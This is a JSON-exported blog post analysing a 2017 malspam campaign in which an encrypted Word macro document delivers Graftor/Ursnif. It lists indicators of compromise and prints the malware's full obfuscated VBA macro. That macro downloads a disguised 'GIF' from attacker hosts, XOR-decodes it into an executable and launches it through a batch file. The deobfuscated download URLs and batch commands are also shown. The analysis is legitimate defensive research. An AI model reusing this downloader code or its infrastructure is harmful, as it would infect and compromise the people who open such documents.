{"id":753,"date":"2017-04-05T12:12:22","date_gmt":"2017-04-05T11:12:22","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=753"},"modified":"2017-04-05T12:26:28","modified_gmt":"2017-04-05T11:26:28","slug":"2017-04-03-malspam-leading-to-graftorursnif","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=753","title":{"rendered":"2017-04-03 Malspam leading to Graftor\/Ursnif"},"content":{"rendered":"<p>Monday there was a file sent via email to an employee with a maldoc attached to it. The maldoc was encrypted and used the password of 3443 to unlock it. Once you unlocked the document, it asked to enable macros. It is from here that this analysis starts. This infection chain seems very close to the one that Sophos had reported on here in this <a href=\"http:\/\/nakedsecurity.sophos.com\/2017\/03\/30\/the-scam-that-knows-your-name-and-home-address-heres-what-to-do\" target=\"_blank\">link<\/a>. Like the test done in the Sophos article, I was not able to get any callback traffic generated on my test VM. <\/p>\n<p>Based on the Virustotal and Hybrid-Analysis links and the article from Sophos, this is falling under the Graftor\/Ursnif family of malware.<\/p>\n<p>Like always, for the artifacts from this investigation, please see my repo <a href=\"http:\/\/github.com\/bloomer1016\/2017-04-03-Malspam-leads-to-Graftor-Ursnif\" target=\"_blank\">here<\/a>.<\/p>\n<p>Indicators of Compromise:<br \/>\n=========================<br \/>\ntruhlarna-macura.cz:80\/ 95.168.206.199<br \/>\nwww.solidaridadsolar.com:80 \/ 134.0.11.204<br \/>\naemquality.com:80 \/ 50.62.103.1<br \/>\n21.12.44.23 (ICMP)<\/p>\n<p>Artifacts:<br \/>\n==========<br \/>\nFile name: 03167.exe<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp<br \/>\nFile size: 207KB<br \/>\nMD5 hash: 8443bc47a982d6c5761d3182415e48e4<br \/>\nVirustotal: <a href=\"http:\/\/virustotal.com\/en\/file\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689\/analysis\/\" target=\"_blank\">http:\/\/virustotal.com\/en\/file\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689\/analysis\/<\/a><br \/>\nFirst detection: 2017-04-03 10:21:40 UTC<br \/>\nDetection Ratio: 8 \/ 61<br \/>\nMalwr: <a href=\"http:\/\/malwr.com\/analysis\/ZmE2YjI1ZTAzNzEzNGMxOWE3MmZiY2JmNWU3ODY0MjA\/ and http:\/\/malwr.com\/analysis\/ZTgzY2U4YzMyNTNmNDI3OWFlNzk0ZWM0MWJlMjgzNTc\/\" target=\"_blank\">http:\/\/malwr.com\/analysis\/ZmE2YjI1ZTAzNzEzNGMxOWE3MmZiY2JmNWU3ODY0MjA\/ and http:\/\/malwr.com\/analysis\/ZTgzY2U4YzMyNTNmNDI3OWFlNzk0ZWM0MWJlMjgzNTc\/<\/a><br \/>\nHybrid Analysis: <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689?environmentId=100\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689?environmentId=100<\/a><\/p>\n<p>File name: 03167.tmp<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp<br \/>\nFile size: 207KB<br \/>\nMD5 hash: 0efa064779ccb639a07fc1ae088e04ff<br \/>\nVirustotal: NA<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: NA<\/p>\n<p>File name: 03167.cmd<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp<br \/>\nFile size: 98KB<br \/>\nMD5 hash: a27604e68dafb7ceaadd6354d7c82c4a<br \/>\nVirustotal: NA<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: NA<\/p>\n<p>File name: logo[1].gif<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8LBPK0D0\\logo[1].gif<br \/>\nFile size: 207KB<br \/>\nMD5 hash: 0efa064779ccb639a07fc1ae088e04ff<br \/>\nVirustotal: NA<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: NA<\/p>\n<p>File name: fili.exe<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Dawu\\fili.exe<br \/>\nFile size: 612KB<br \/>\nMD5 hash: 7e7229ba9b4047f8471c53e4f8800908<br \/>\nVirustotal: NA<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: NA<\/p>\n<p>File name: id.dat<br \/>\nFile size: 612KB<br \/>\nMD5 hash: 7e7229ba9b4047f8471c53e4f8800908<br \/>\nVirustotal: <a href=\"http:\/\/virustotal.com\/en\/file\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076\/analysis\/\" target=\"_blank\">http:\/\/virustotal.com\/en\/file\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076\/analysis\/<\/a><br \/>\nFirst detection: 2017-04-03 13:57:27 UTC<br \/>\nDetection ratio: 36 \/ 61<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076?environmentId=100\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076?environmentId=100<\/a><\/p>\n<p>Analysis of Malware:<br \/>\n====================<br \/>\nAs mentioned above the user received the below email that contained a malicious Word document that was encrypted to get around any sandboxing analysis. <\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Email.png\" alt=\"\" width=\"503\" height=\"401\" class=\"aligncenter size-full wp-image-766\" \/><\/a><\/p>\n<p>Once the Word document is downloaded, the file opened, and macros enabled the Word doc displays a message stating that it is checking the status of the SSL certificate for a few seconds. After that we get the same pop-up that Sophos mentioned &#8211; that the file is corrupted and cannot be opened. Once you click on &#8220;OK,&#8221; the Word document is closed. Now for the average user, they would not think anything of this, but it is what happens after a minute or so that gives a hint of something nefarious going on stemming from this Word document. There is a Windows popup stating that the process &#8220;0484A.exe has stopped working&#8221; as seen below.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Stopped.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Stopped.png\" alt=\"\" width=\"500\" height=\"241\" class=\"aligncenter size-full wp-image-761\" \/><\/a><\/p>\n<p>Starting from the network side of this infection, once the Word document is run, there is a call to the site truhlarna-macura[.]cz requesting a GIF file. <\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/GIF_Download.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/GIF_Download.png\" alt=\"\" width=\"2506\" height=\"1136\" class=\"aligncenter size-full wp-image-757\" \/><\/a><\/p>\n<p>Looking at the request, you can see that the supposed GIF file is 207114 bytes, which seems to match up to the actual GIF file size, and some of the other binary files that are dropped on to the system (03167.exe\/03167.tmp). <\/p>\n<p>Next we see an old trick to help defeat sandboxing techniques &#8211; a PING request to 21.12.44.23. This IP address belong to DoD based on Robtex: http:\/\/www.robtex.com\/?ip=21.12.44.23&amp;whois=1.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nNetRange:\t21.0.0.0 - 21.255.255.255\r\nCIDR:\t21.0.0.0\/8\r\nNetName:\tDNIC-SNET-021\r\nNetHandle:\tNET-21-0-0-0-1\r\nParent:\t()\r\nNetType:\tDirect Allocation\r\nOriginAS:\t\r\nOrganization:\tDoD Network Information Center (DNIC)\r\nRegDate:\t1991-07-01\r\nUpdated:\t2009-06-19\r\nRef:\thttp:\/\/whois.arin.net\/rest\/net\/NET-21-0-0-0-1<\/pre>\n<p>We also see a request for Github too, but I am not sure what transpired here since this is over SSL. <\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Github.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Github.png\" alt=\"\" width=\"1108\" height=\"614\" class=\"aligncenter size-full wp-image-758\" \/><\/a><\/p>\n<p>We then see a call to the site www[.]solidaridadsolar[.]com which must have been cleaned up by the time I ran this on my test VM (and could explain part of the reason why nothing else happened on the VM).<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Dead_Link.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Dead_Link.png\" alt=\"\" width=\"1143\" height=\"700\" class=\"aligncenter size-full wp-image-755\" \/><\/a><\/p>\n<p>And then lastly a call to aemquality[.]com to get a file called &#8220;id.dat.&#8221;<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/id_dat.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/id_dat.png\" alt=\"\" width=\"1136\" height=\"697\" class=\"aligncenter size-full wp-image-759\" \/><\/a><\/p>\n<p>From the host side of things, this was a pretty straight forward infection. Once the Word document is run, the VB script is executed and we can assume that it makes the request to download the malicious &#8220;GIF&#8221; file. We also see that Word creates a new CMD process which in turn creates a batch file called &#8220;03137.cmd.&#8221; While the GIF file is striping out the malicious binary file, the batch file is doing a PING to the IP address of 21.12.44.23 and also to execute the 03137.exe binary.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n@echo off\r\nping 21.12.44.23 -n 1 -w 2000 &gt; NUL\r\nstart C:\\Users\\Bill\\AppData\\Local\\Temp&#092;&#048;3167.exe<\/pre>\n<p>Once the 03137.exe binary is started, it starts going through the system looking at various things on the filesystem and within the registry (with a heavy emphasis when looking at registry keys related to certificates). It then creates the file called &#8220;fili.exe&#8221; and it starts to execute that file. This file, like the 03137.exe file looks at various things on the system (filesystem and registry) and after a bit terminates causing a system fault (the error message that pops up after a minute once the Word document has been closed). From there everything shuts down and no further activity is seen.<\/p>\n<p>Since I was not able to get much further from here, I asked one of my colleagues to take a look and see if he was able to get it to go further. Thankfully he was able to and also shared with me an interesting tip that I was not aware of &#8211; saving the encrypted Word document as a new file and deleting the password from it as seen below.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/saveas.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/saveas.png\" alt=\"\" width=\"1275\" height=\"539\" class=\"aligncenter size-full wp-image-760\" \/><\/a><\/p>\n<p>Once I did that, I was able to get to the script using OfficeMalDoc and extracting out the file that (granted you can also just extract the files out from the Word doc since it is another example of an archive).<\/p>\n<p>Below is the VBA script from the Word document.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nAttribute VB_Name = &quot;ThisDocument&quot;\r\nAttribute VB_Base = &quot;0{00020906-0000-0000-C000-000000000046}&quot;\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = False\r\nAttribute VB_Customizable = True\r\n#If VBA7 And Win64 Then\r\nPrivate Declare PtrSafe Function uhodixi Lib &quot;shell32.dll&quot; Alias &quot;ShellExecuteA&quot; (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong\r\nPrivate Declare PtrSafe Function ocabype Lib &quot;kernel32&quot; Alias &quot;GetTempPathA&quot; (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long\r\nPrivate Declare PtrSafe Function hogezij Lib &quot;kernel32&quot; Alias &quot;GetTempFileNameA&quot; (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long\r\nPrivate Declare PtrSafe Function egawomy Lib &quot;urlmon&quot; Alias &quot;URLDownloadToFileA&quot; (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long\r\n#Else\r\nPrivate Declare Function uhodixi Lib &quot;shell32.dll&quot; Alias &quot;ShellExecuteA&quot; (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long\r\nPrivate Declare Function ocabype Lib &quot;kernel32&quot; Alias &quot;GetTempPathA&quot; (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long\r\nPrivate Declare Function hogezij Lib &quot;kernel32&quot; Alias &quot;GetTempFileNameA&quot; (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long\r\nPrivate Declare Function egawomy Lib &quot;urlmon&quot; Alias &quot;URLDownloadToFileA&quot; (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\nSub Document_Open()\r\n\r\nDim pupujoh As String\r\nDim neqizuv As String\r\nDim asajuko As Long\r\nDim xeryxeb As Long\r\nDim etopedo As Integer\r\nDim yqaluqe() As Byte\r\nDim qilogyb As Object\r\nDim alugumi As Object\r\n      \r\n#If Win64 Then\r\nDim fysisin As LongLong\r\n#Else\r\nDim fysisin As Long\r\n#End If\r\n\r\nActiveDocument.Content.Delete\r\nActiveDocument.PageSetup.LeftMargin = 240\r\nActiveDocument.PageSetup.TopMargin = 100\r\n\r\nSet myRange = ActiveDocument.Content\r\n\r\nWith myRange.Font\r\n .Name = acuzamu(&quot;P~})sbs&quot;)\r\n .Size = 14\r\nEnd With\r\nActiveDocument.Range.Text = acuzamu(&quot;ZU~5O-11g-5~}h;Y;5sh~&quot;&quot;&quot;) &amp; vbLf &amp; acuzamu(&quot;-----iR~s&lt;~-Js;h&quot;&quot;&quot;&quot;&quot;&quot;&quot;)\r\n\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\n\r\npupujoh = esecana\r\nasajuko = egawomy(0, acuzamu(&quot;UhhWQHHh}0URs}bs*8s50}s&quot;&quot;5!H;8vHR(v(&quot;&quot;v;Y&quot;), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\n\r\nIf asajuko &lt;&gt; 0 And xeryxeb &lt; 183927 Then\r\nasajuko = egawomy(0, acuzamu(&quot;UhhWQHHv0s8sh~b&quot;&quot;5(8HW}0~dsHR(v(&quot;&quot;v;Y&quot;), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\nEnd If\r\n\r\nIf asajuko &lt;&gt; 0 And xeryxeb &lt; 175274 Then\r\nasajuko = egawomy(0, acuzamu(&quot;UhhWQHHW}~Y8sF0s&quot;&quot;5(8Hf50&lt;0);HR(v(&quot;&quot;v;Y&quot;), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\nEnd If\r\n\r\nIf xeryxeb &lt; 179218 Then\r\nActiveDocument.Content.Delete\r\nMsgBox acuzamu(&quot;B(-;bh~}b~h-s55~&lt;&lt;&quot;&quot;-?0}b-(YY-sbq-Y;}~JsRR-(}-sbh;*N;}0&lt;-&lt;(YhJs}~-sb)-h}q-svs;b&quot;&quot;&quot;), vbCritical, acuzamu(&quot;I}}(}&quot;)\r\nApplication.Quit SaveChanges:=0\r\nExit Sub\r\nEnd If\r\n\r\netopedo = FreeFile\r\nOpen pupujoh For Binary As #etopedo\r\nReDim yqaluqe(0 To LOF(etopedo) - 1)\r\nGet #etopedo, , yqaluqe()\r\nClose #etopedo\r\n  \r\nCall ejynebe(yqaluqe())\r\n\r\npupujoh = Left(pupujoh, Len(pupujoh) - 3)\r\npupujoh = pupujoh &amp; acuzamu(&quot;~ ~&quot;)\r\n\r\nneqizuv = Left(pupujoh, Len(pupujoh) - 3)\r\nneqizuv = neqizuv &amp; acuzamu(&quot;58)&quot;)\r\n\r\netopedo = FreeFile\r\nOpen pupujoh For Binary As #etopedo\r\nPut #etopedo, , yqaluqe()\r\nClose #etopedo\r\n \r\nActiveDocument.Content.Delete\r\nMsgBox acuzamu(&quot;?U~-Y;R~-;&lt;-5(}}0Wh~)-sb)-5sbb(h-d~-(W~b~)&quot;), vbCritical, acuzamu(&quot;I}}(}&quot;)\r\n\r\nSet qilogyb = CreateObject(acuzamu(&quot;15};Wh;bv&quot;&quot;,;R~1q&lt;h~8&#x5B;dx~5h&quot;))\r\nSet alugumi = qilogyb.CreateTextFile(neqizuv)\r\nalugumi.WriteLine acuzamu(&quot;u~5U(-(YY&quot;)\r\nalugumi.WriteLine acuzamu(&quot;W;bv-G2&quot;&quot;2G&quot;&quot;@@&quot;&quot;G=-*b-2-*J-G```-'-B6g&quot;)\r\nalugumi.WriteLine acuzamu(&quot;&lt;hs}h-&quot;) &amp; pupujoh\r\nalugumi.Close\r\n\r\nfysisin = uhodixi(0, acuzamu(&quot;&#x5B;W~b&quot;), neqizuv, 0, 0, 6)\r\nApplication.Quit SaveChanges:=0\r\nEnd Sub\r\n\r\n\r\nPublic Function esecana() As String\r\n  Dim ezytate As String * 312\r\n  Dim jymyryq As String * 618\r\n  Dim ivecaco As Long\r\n  Dim ymohoba As String\r\n  \r\n  ivecaco = ocabype(312, ezytate)\r\n  If (ivecaco &gt; 0 And ivecaco &lt; 312) Then\r\n    ivecaco = hogezij(ezytate, 0, 0, jymyryq)\r\n    If ivecaco &lt;&gt; 0 Then\r\n        ymohoba = Left$(jymyryq, InStr(jymyryq, vbNullChar) - 1)\r\n    End If\r\n    esecana = ymohoba\r\n  End If\r\nEnd Function\r\n\r\nPublic Sub ejynebe(yqaluqe() As Byte)\r\n  Dim eqoneji As Long\r\n  Dim esyjato As Long\r\n  Dim norixec As Long\r\n  Dim ugagoqo(256) As Byte\r\n  Dim zynebit As Long\r\n  Dim yzetyso As Long\r\n  \r\n   \r\n  esyjato = UBound(yqaluqe) + 1\r\n  \r\n  For eqoneji = 10 To 265\r\n    ugagoqo(eqoneji - 10) = yqaluqe(eqoneji)\r\n  Next\r\n  \r\n  zynebit = UBound(ugagoqo) + 1\r\n  \r\n  yzetyso = 0\r\n  For eqoneji = 266 To (esyjato - 1)\r\n    yqaluqe(eqoneji - 266) = yqaluqe(eqoneji) Xor ugagoqo(yzetyso)\r\n    yzetyso = yzetyso + 1\r\n    \r\n    If yzetyso = (zynebit - 1) Then\r\n        yzetyso = 0\r\n    End If\r\n  Next\r\n  \r\n  ReDim Preserve yqaluqe(esyjato - 267)\r\n  \r\nEnd Sub\r\n\r\nPublic Function acuzamu(ByVal moluhyp As String) As String\r\n  Dim begozat(256)\r\n  Dim abuvuba As String\r\n  Dim ijuhoqe As Long\r\n  Dim korupaj As String\r\n \r\nabuvuba = &quot;xz.~^7;&gt;od-DF )}uS1&#x5B;=cU`mGWis3MT4{N%9Zq2\/Ew(&amp;+vkV:l\\!hKp8fCOAR6?0|nYbI_LtPB'H&lt;Q$Xy&quot;&quot;aJ@g#j5],*re&quot;\r\n  For ijuhoqe = 1 To Len(abuvuba)\r\n  begozat(ijuhoqe + 31) = Mid(abuvuba, ijuhoqe, 1)\r\n  Next ijuhoqe\r\n  \r\n  For ijuhoqe = 1 To Len(moluhyp)\r\n  korupaj = Mid(moluhyp, ijuhoqe, 1)\r\n  acuzamu = acuzamu &amp; begozat(Asc(korupaj))\r\n  Next ijuhoqe\r\nEnd Function<\/pre>\n<p>Looking at the script, it looks like the decryption function is the acuzamu function since we see that function being called several times throughout the script. Unfortunately I was not able to get the strings deobfuscated from the script, but my colleague was able to. Here is what he found when deobfuscating the script:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nVerdana\r\nCheck SSL certificate.\r\n     Please wait...\r\nhttp:\/\/truhlarna-macura.cz\/img\/logo.gif\r\nhttp:\/\/guamaten.com\/prueba\/logo.gif\r\nhttp:\/\/prefmaqua.com\/_cusudi\/logo.gif\r\nNo internet access. Turn off any firewall or anti-virus software and try again.\r\nThe file is corrupted and cannot be opened\r\nScripting.FileSystemObject\r\n@echo off\r\nping 21.12.44.23 -n 1 -w 2000 &gt; NUL\r\nstart\r\nScripting.FileSystemObject<\/pre>\n<p>He also noted that the GIF, once decoded to an executable, makes a network call to some well known sites such as instagram, github, and linkedin. We are assuming that this is another network connectivity check. Lastly, he also noted that the file &#8220;id.dat&#8221;\u00a0was another executable binary as well which makes sense since it, and the file called &#8220;fili.exe&#8221; have the same MD5 hash. I am assuming that this file, like the GIF, is being converted into a binary (in this case via the 03167.exe file\/process). When I was writing this up yesterday there was nothing listed for the id.dat file in Hybrid Analysis or in Virustotal. This morning when reading his notes, he noted that there were now hits for the MD5 (which has been updated above for id.dat).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Monday there was a file sent via email to an employee with a maldoc attached to it. The maldoc was encrypted and used the password of 3443 to unlock it. Once you unlocked the document, it asked to enable macros. It is from here that this analysis starts. This infection chain seems very close to the one that Sophos had reported on here in this link. Like the test done in the Sophos article, I was not able to get any callback traffic generated on my test VM. Based on the Virustotal and Hybrid-Analysis links and the article from Sophos,&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=753\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-753","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/753","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=753"}],"version-history":[{"count":7,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/753\/revisions"}],"predecessor-version":[{"id":769,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/753\/revisions\/769"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}